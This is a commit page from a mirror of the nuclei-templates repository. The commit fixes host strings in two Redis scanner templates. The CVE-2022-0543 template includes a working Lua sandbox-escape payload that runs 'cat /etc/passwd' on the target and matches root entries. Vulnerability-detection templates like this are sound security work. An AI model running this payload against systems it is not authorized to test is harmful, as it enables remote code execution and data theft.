daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #8610 from pentesttools-com/fix-false-negatives-redis-cve-and-exposure 

Fix false negatives and typos in Redis CVE-2022-0543.yaml and exposed…
patch-1
pussycat0x 2023-11-17 11:47:53 +05:30 committed by GitHub
parent 4e394f1116 be5fc1142f
commit 3e512a4e47
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 8 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
network/cves/2022/CVE-2022-0543.yaml
View File

@ -5,10 +5,7 @@ info:
author: dwisiswant0
severity: critical
description: |
This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The
vulnerability was introduced by Debian and Ubuntu Redis packages that
insufficiently sanitized the Lua environment. The maintainers failed to
disable the package interface, allowing attackers to load arbitrary libraries.
This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The vulnerability was introduced by Debian and Ubuntu Redis packages that insufficiently sanitized the Lua environment. The maintainers failed to disable the package interface, allowing attackers to load arbitrary libraries.
reference:
- https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce
- https://attackerkb.com/topics/wyA1c1HIC8/cve-2022-0543/rapid7-analysis#rapid7-analysis
@ -28,16 +25,19 @@ info:
shodan-query: redis_version
vendor: redis
tags: cve,cve2022,network,redis,unauth,rce,kev
tcp:
- host:
- "tls://{Hostname}}"
- "{{Hostname}}"
- "tls://{{Hostname}}"
port: 6380
inputs:
- data: "eval 'local io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\"); local io = io_l(); local f = io.popen(\"cat /etc/passwd\", \"r\"); local res = f:read(\"*a\"); f:close(); return res' 0\r\n"
read-size: 64
matchers:
- type: regex
regex:
- "root:.*:0:0:"
# digest: 4a0a00473045022027e375b83c9a6ee84e49c4a5f8ae2f56fc76db2d2acd7ec1b9a60bf45d7598de022100e7047e480c8a983cbe88770790661452320d96f1d4e18465298ff2403273a0f6:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022027e375b83c9a6ee84e49c4a5f8ae2f56fc76db2d2acd7ec1b9a60bf45d7598de022100e7047e480c8a983cbe88770790661452320d96f1d4e18465298ff2403273a0f6:922c64590222798bb761d5b6d8e72950

3
network/exposures/exposed-redis.yaml
View File

@ -20,7 +20,8 @@ tcp:
- data: "info\r\nquit\r\n"
host:
- "tls://{Hostname}}"
- "{{Hostname}}"
- "tls://{{Hostname}}"
port: 6380
read-size: 2048